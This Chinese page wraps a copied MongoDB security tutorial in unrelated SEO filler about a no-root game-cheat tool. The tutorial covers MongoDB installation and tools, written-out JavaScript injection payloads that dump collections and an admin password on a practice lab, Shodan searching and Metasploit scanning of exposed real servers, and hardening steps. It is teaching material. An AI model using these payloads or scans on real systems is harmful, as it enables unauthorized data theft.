各位游戏大佬大家好,今天小编为大家分享关于gg修改器免root蓝奏云_gg修改器免root修改教程的内容,轻松修改游戏数据,赶快来一起来看看吧。
本篇文章是MongoDB数据库信息泄露漏洞复现,记录了实际中常见的MongoDB数据库未授权访问漏洞并如何使用,主要分为七个部分:MongoDB简介、MongoDB安装、MongoDB基本操作、MongoDB相关工具使用、MongoDB漏洞复现、MongoDB实战和MongoDB防御措施。
MongoDB是一个高性能,开源,无模式的 文档型数据库 ,是一个基于分布式文件存储的数据库,由C++编写。其中的数据以JSON格式文档的形式存储。MongoDB是一个介于关系数据库和非关系数据库之间的产品,是当前 NoSQL 数据库产品中最热门的一种。
27017:mongod和mongos实例的默认端口。
27018:设置–shardsvr运行变量或在配置文件里设置clusterRole为shardsvr时的默认端口
SQL术语/概念 |
MongoDB术语/概念 |
解释/说明 |
database |
database |
数据库 |
table |
collection |
数据库表/集合 |
row |
document |
数据记录行/文档 |
column |
field |
数据字段/域 |
index |
index |
索引 |
Mongodb中每个数据库含有一个或多个集合collections(相当于table)
Mongodb中每个集合含有一个或多个文档document(相当于数据行)
文档Document是一组键值对,MongoDB 的文档不需要设置相同的字段,并且相同的字段不需要相同的数据类型,这与关系型数据库有很大的区别,也是 MongoDB 非常突出的特点。文档简单例子:
{"username":"tom","password":"tom","email":"tom@"}
admin: 从权限的角度来看,这是”root”数据库。要是将一个用户添加到这个数据库,这个用户自动继承所有数据库的权限。一些特定的服务器端命令也只能从这个数据库运行,比如列出所有的数据库或者关闭服务器。
local:这个数据永远不会被复制,可以用来存储限于本地单台服务器的任意集合
config: 当Mongo用于分片设置时,config数据库在内部使用,用于保存分片的相关信息。
MongoDB 未配置访问认证授权 ,无需认证连接数据库后对数据库进行任意操作(未授权访问漏洞),存在严重的数据泄露风险。默认情况下MongoDB安装后,没有账号密码且未开启权限验证。但不同版本的监听地址不同,3.0之前版本默认监听在0.0.0.0,3.0及之后版本默认监听在127.0.0.1。
MongoDB官网提供了32位、64位的预编译二进制包。选择最新版下载msi即可(截止到写这篇文章的时间,最新版本为4.4.5)
MongoDB下载地址: https://www./try/munity
下载好后,拖进虚拟机,双击安装
选择 Custom 自定义安装
这里默认即可,Data Directory和Log Directory分别存放数据及日志文件信息
在默认的安装下,该文件会自动安装。也可以不勾选 install pass ,到官网上去安装。这里留到后面单独装。
等待片刻即可安装完成,遇到提示选择第一个即可。
mongod.cfg 文件为Windows里的配置文件,在Linux中名字为 mongod.conf
在 mongod.cfg 文件中将 bindIP 地址修改为 0.0.0.0 ,这样外部 IP 可以连接 MongoDB ,便于测试
# network interfaces
net:
port: 27017
bindIp: 0.0.0.0
将 bin 目录配置进环境变量 C:MongoDBin
测试是否配置成功,在cmd下直接输入mongo即可判断
目的:将 mongodb 服务安装到 Windows 服务中,可以通过net命令进行开启和关闭
首先在 C:MongoDB 目录下创建一个 mongodb.conf 文件(这个文件名和文件的路径随意,只要在mongodb目录下就行)
编辑该文件,配置相关信息,修改部分即可
#数据库路径
dbpath=c:MongoDBdata
#日志输出文件路径
logpath=c:MongoDBlogmongodb.log
#错误日志采用追加模式,配置这个选项后mongodb的日志会追加到现有的日志文件,而不是从新创建一个新文件
logappend=true
#启用日志文件,默认启用
journal=true
#这个选项可以过滤掉一些无用的日志信息,若需要调试使用请设置为false
quiet=false
#端口号 默认为27017
port=27017
然后在cmd中输入下面命令,命名该服务名为 mongodb
mongod --config c:MongoDBmongodb.conf --install --serviceName "mongodb"
net stop mongodb
net start mongodb
参考下文第四点: Windows下图文详解Mongodb安装及配置
wget -qO - https://www.mongodb.org/static/pgp/server-4.4.asc | sudo apt-key add -
echo "deb http://repo.mongodb.org/apt/debian buster/mongodb-org/4.4 main" | sudo tee /etc/apt/sources.list.d/mongodb-org-4.4.list
sudo apt-get update
sudo apt-get install -y mongodb-org
sudo systemctl start mongod
#查看端口信息
netstat -ntulp
systemctl status mongod
systemctl stop mongod
systemctl restart mongod
5)设置允许远程连接可在远程访问该库信息
sudo vi /etc/mongod.conf
# 修改bindIP为0.0.0.0
# network interfaces
net:
port: 27017
bindIp: 0.0.0.0
删除软件包:
sudo apt-get purge mongodb-org*
可以通过下面命令来查看这些软件包文件,也可以检测是否删除完成
locate monodb-org
删除数据目录:
sudo rm -r /var/log/mongodb
sudo rm -r /var/lib/mongodb
MongoDB Shell 是 MongoDB 自带的交互式 Javascript shell ,用于对 MongoDB 进行操作和管理的交互式环境。进入到 MongoDB shell 后,直接在命令行窗口下输入 mongo 即可(前提是配置了环境变量),进入后默认连接到test(数据库)。由于自带交互式 Javascript shell ,可以直接在Mongo shell里进行一些简单的计算操作。
> 1+1
2
> 0x10+0x10
32
show dbs
默认登陆后,当前数据库为test
db
use xiguadb
这里创建的xiguadb数据库并没有显示在dbs中,需要在xiguadb数据库中添加文档即可
db.xiguadb.insert({"name":"john"})
插入文档后,dbs中显示了xiguadb数据库 注:这里文档是插入到名为xiguadb的集合中(自动创建的集合)
当前数据库下的所有集合列表
show collections
show tables
在 MongoDB 中,不需要创建集合。当你插入一些文档时,MongoDB 会自动创建集合,一般同数据库名。
db.createCollection("lanmei")
先插入几条文档,再进行条件查询,pretty() 方法以格式化的方式来显示所有文档
db.lanmei.insert({"str":"kkk","id":"001"})
db.lanmei.insert({"num":"1234567","id":"002"})
db.lanmei.find({"num":"1234567"}).pretty()
文档插入后会自动添加一个 _id 属性,为唯一标识符
db.lanmei.remove({"str":"kkk"})
删除键值对为str和kkk的文档
db.lanmei.drop()
删除目前使用的数据库
db.dropDatabase()
mongo --host 192.168.112.177 --port 27017 -u "mgtest" -p "" --authenticationDatabase "admin"
或者
mongo -u mgtest -p localhost:27017/admin
pass 为 MongoDB 可视化工具,用于运维(可装可不装)
在默认的安装下,该文件会自动安装。也可以不勾选 install pass ,到官网上去安装 下载链接: https://www./download-pass
选择最新版下载文件即可(zip、msi均可)
启动进入程序后,点击Connect连接本地数据库
连接成功,可以看到本地MongoDB数据库信息
MongoDB Compass作为官方的一款可视化管理工具,使用体验还是挺不错的
Robo 3T是一款免费、开源的MongoDB可视化管理工具。其前身为Robomongo,后被3T Software Labs收购更名为Robo 3T。
下载地址: https://robomongo.org/ 蓝奏云下载: https://wwe./iV7hXo5baej
下载好后,点击启动安装,默认下一步即可
启动Robo 3T程序,在连接界面选择左上角的Create选项,地址填本地地址及端口,连接进入
这里以上面的演示的xiguadb数据库和lanmei集合为例。下图可以看到MongoDB数据库信息结构
db.lanmei.insert({"str":"kkk","id":"001"})
db.lanmei.insert({"num":"1234567","id":"002"})
在查询窗口中输入命令进行查询操作,可自行上手体验。
Navicat for MongoDB 提供高效图形化界面,用于MongoDB 数据库的管理、开发和监控。它能连接本地或远程的 MongoDB服务器。
中文下载地址: http://www..cn/products/navicat-for-mongodb 英文下载地址: https:///en/products/navicat-for-mongodb
下载好安装程序后,默认下一步安装
安装路径默认
进入主页面后,选择连接,选择 MongoDB ,填连接名 mongo (这个名是随意填的)
之后操作轻松上手
NoSQLMap是一款免费、开源的基于python2的脚本工具,用于审计和自动注入攻击,并利用 NoSQL 数据库和 Web 应用程序中的默认配置弱点,使用 NoSQL 来披露或克隆数据库中的数据。是市面上为数不多的支持MongoDB数据库SQL注入的工具。
项目地址: https:///codingo/NoSQLMap
python setup.py install
python nosqlmap.py
1-设置选项 2-NoSQL数据库访问攻击 3-NoSQL Web应用程序攻击 4-扫描匿名MongoDB访问 5-Change平台(目前:MongoDB) x-Exit
选择1-设置选项
1-设置目标主机/IP(当前:未设置)
2-设置web应用端口(当前为80)
3-设置App路径(当前:未设置)
4-切换为HTTPS(当前关闭)
5-设置MongoDB端口(当前:27017)
6-设置HTTP请求方式(GET/POST) (Current: GET)
7-设置MongoDB/Shell本地IP(当前:未设置)
8-设置shell监听端口(当前:未设置)
9-设置详细模式(Current: OFF)
0-载入选项文件
a-从保存的Burp请求载入选项
b-保存选项文件
h-设置请求头
x-返回主菜单
这里以上面的mozhe靶场做演示,靶场地址为: http://219.153.49.228:49818/new_list.php?id=1
填完相关配置项后,x返回主菜单,选择3NoSQL Web应用攻击
跑完一圈下来,注入全部失败。。
上手体验极差,毕竟这个脚本上次更新已经好久了,这款脚本比较鸡肋,还是手动注入行。
MongoDB在3版本以后并未出现RCE漏洞,一般的MongoDB漏洞基本上都是信息泄露之类的,所以要RCE还要和其余漏洞进行配合,下面介绍的漏洞也基本上是关于信息泄露的。
信息泄露
MSF中提供了一些用于渗透测试的脚本,输入下面命令查看和mongodb相关的渗透脚本。可以看到MSF中并没有很多关于MongoDB的脚本,唯一一个exploit也是对应2.x版本的MongoDB,现在基本没啥用,图中最有用的就属mongodb_login脚本了,它是一个扫描脚本,用于扫描目标主机是否开启MongoDB服务的27017端口及是否存在未授权访问漏洞
search mongodb
以Win 2016上的MongoDB测试,其IP地址为:192.168.112.176,使用脚本mongodb_login,查看选项。
这个脚本一般就可以用于批量扫描MongoDB服务及未授权访问漏洞,可以进一步结合上面提及到的GUI管理工具(Compass、Robo 3T、Navicat)登陆进MongoDB查看到数据库信息造成信息泄露。
信息泄露
复现地址: https://www./bug/detail/YXlRYUJPYk1vQjAreHlweVAyMzVTUT09bW96aGUmozhe
SQL手工注入漏洞测试(MongoDB数据库),手工进行SQL注入测试,获取管理密码登录。
背景介绍:安全工程师”墨者”最近在练习SQL手工注入漏洞,自己刚搭建好一个靶场环境Nginx+PHP+MongoDB,PHP代码对客户端提交的参数未做任何过滤。尽情地练习SQL手工注入吧。
附上源代码截图:
进入靶场后,发现一个通知页面,在地址栏可以看到id参数,很有可能是注入点
在最后面添加单引号进行测试,页面发生了变化,说明存在SQL注入漏洞
id=1%27
源代码重要部分:
# 查询语句,这里id值可控且没有经过过滤和限制
$query = "var data = db.notice.findOne({’id’:’$id’}); return data;";
#打印出数据库中title字段和content字段信息
<?php echo $obj[’retval’][’title’] ?>
<?php echo $obj[’retval’][’content’] ?>
4)构造链接测试
id=1’}); return ({title:1,content:’test
id=1’}); return ({title:tojson(db),content:’test
查询当前库名
db返回的是一个数组,回显为array,使用tojson()方法将其转为字符串类型
查询当前库的所有集合
id=1’}); return ({title:tojson(db.getCollectionNames()),content:’test
getCollectionNames()以数组形式返回所有集合,需要使用tojson()方法转字符串格式
直接查询第1个集合名
id=1’}); return ({title:db.getCollectionNames()[0],content:’test
可以爆出用户名和密码信息
id=1’}); return ({title:tojson(db.Authority_confidential.find()[0]),content:’test
MD5加密:a83cd5ad5ed3e1c5597441aaab289f5c
解密后 dsansda
Linux:
mongo --host 219.153.49.228 -u "mozhe" --authenticationDatabase "mozhe" -p’dsansda’
使用Robo 3T
填入登陆用户及密码
登陆后获取Key即可,不过这里始终登不进去,该IP连接不到,这个应该是靶场的问题。
这部分主要是在网络搜索到一些存在未授权访问漏洞的MongoDB服务,查看到其数据,这部分较敏感,大致演示下即可
输入关键字product:”MongoDB”进行搜索
在MSF中进行扫描检测(国外的站)
经过多次测试,可以发现目前大部分暴露在网络上的存在未授权访问漏洞MongoDB服务都已经被”上锁”了,对于提升MongoDB的安全性,还需要一些防御措施
在mongod.cfg文件中将监听IP地址改为指定IP或者本地IP(Linux下为mongod.conf文件)
# network interfaces
net:
port: 27017
bindIp: 127.0.0.1
MongoDB支持SCRAM、x.509证书认证等多种认证机制,SCRAM(Salted Challenge Response Authentication Mechanism)是3.x版本的默认认证机制,该机制通过用户名、密码验证,基于用户角色进行访问控制。
# 切换至admin数据库下
use admin
# 创建mgtest用户,密码为123.con
db.createUser(
{
user: "mgtest",
pwd: "",
roles: [ { role: "userAdminAnyDatabase", db: "admin" } ]
}
)
# userAdminAnyDatabase: 赋予所有数据库的useradmin权限
对匿名登陆的用户进行权限限制,需要进行认证
vi /etc/mongod.conf
security:
authorization: enabled
重启MongoDB服务
mongo --port 27017 -u "mgtest" -p "" --authenticationDatabase "admin"
或者
mongo -u mgtest -p localhost:27017/admin
远程登陆
mongo --host 192.168.112.177 --port 27017 -u "mgtest" -p "" --authenticationDatabase "admin"
如果这里以普通用户直接登陆,可以登陆进,但是没有权限。
使用MSF的mongodb_login模块也扫描不到该主机存在未授权访问漏洞
也在连接MongoDB时匿名登陆,连接成功后通过db.auth()方法进行认证
use admin
db.auth("mgtest","")
本文介绍了MongoDB的使用、MongoDB注入、未授权访问漏洞及防御措施,在MongoDB3.0以后的版本基本上就只存在未授权访问漏洞一种,并未RCE漏洞,也就是只存在信息泄露的可能,并不像其他数据库可以直接拿shell,在这方面MongoDB的安全性还是偏高的。
原文链接:https://www./vuls/277847.html
以上就是关于gg修改器免root蓝奏云_gg修改器免root修改教程的全部内容,游戏大佬们学会了吗?
gg修改器免root怎么修改,下载一个神奇的软件:gg修改器免root版 分类:免root版 2,691人在玩 如果你是一名游戏爱好者,那么你肯定会遇到一些让人沮丧的困境。例如,游戏中需要大量的金币或钻石才能获得更好的装备和角色,但是这些资源往往需要付出大量的时间和精力才能获取。……
下载如何给gg修改器免除root_怎么使gg修改器 分类:免root版 6,522人在玩 各位游戏大佬大家好,今天小编为大家分享关于如何给gg修改器免除root_怎么使gg修改器的内容,轻松修改游戏数据,赶快来一起来看看吧。 【九】磁盘管理 9.1 linux硬盘的基本概念: 1……
下载安卓免root框架gg修改器,什么是安卓免root框架gg修改器? 分类:免root版 4,233人在玩 安卓免root框架gg修改器:打造无限可能的游戏世界 安卓免root框架gg修改器是一款功能强大的游戏修改工具,可以在不需要root权限的情况下修改手机中的游戏数据。它可以让用户享受到……
下载兔root修改器gg_兔root自动化助手教程 分类:免root版 5,949人在玩 各位游戏大佬大家好,今天小编为大家分享关于兔root修改器gg_兔root自动化助手教程的内容,轻松修改游戏数据,赶快来一起来看看吧。 由于当前Android手机破解ROOT权限的难度和风险……
下载gg修改器rroot荒野_GG修改器荒野乱斗 分类:免root版 4,458人在玩 各位游戏大佬大家好,今天小编为大家分享关于gg修改器rroot荒野_GG修改器荒野乱斗的内容,轻松修改游戏数据,赶快来一起来看看吧。 对于游戏玩家而言,使用起来非常舒适的手柄中,……
下载gg修改器免root版使用 分类:免root版 4,902人在玩 各位游戏大佬大家好,今天小编为大家分享关于gg修改器免root版使用的内容,轻松修改游戏数据,赶快来一起来看看吧。 关于 iOS 15.0 – 15.1.1 Cheyote 越狱,今天又有消息了,……
下载gg修改器免root版简单易懂_gg修改器 免root教程 分类:免root版 7,066人在玩 各位游戏大佬大家好,今天小编为大家分享关于gg修改器免root版简单易懂_gg修改器 免root教程的内容,轻松修改游戏数据,赶快来一起来看看吧。 下载地址:自带BigBoss源,版本号:2.……
下载方舟gg修改器怎么root,下载方舟gg修改器root版,打造无限畅玩 分类:免root版 3,318人在玩 方舟gg修改器是一款非常实用的游戏辅助工具,可以帮助玩家快速提升游戏等级、获取更多游戏资源等。但是,有些手机需要进行root权限才能使用方舟gg修改器,这对一些不懂技术的玩家来……
下载怎么打开gg修改器root权限,下载一个神器:GG修改器root权限教程 分类:免root版 4,597人在玩 如果你是一位游戏爱好者,那么你可能会遇到一些让你十分困扰的问题:比如想要开启某些游戏中的隐藏关卡,或者在某些游戏中获取更多的金币和钻石。这时候,GG修改器就是你最好的选择……
下载GG修改器免root虚拟_gg修改器免root虚拟空间怎么启动 分类:免root版 4,485人在玩 各位游戏大佬大家好,今天小编为大家分享关于GG修改器免root虚拟_gg修改器免root虚拟空间怎么启动的内容,轻松修改游戏数据,赶快来一起来看看吧。 IT之家(www.):如果把这十个功……
下载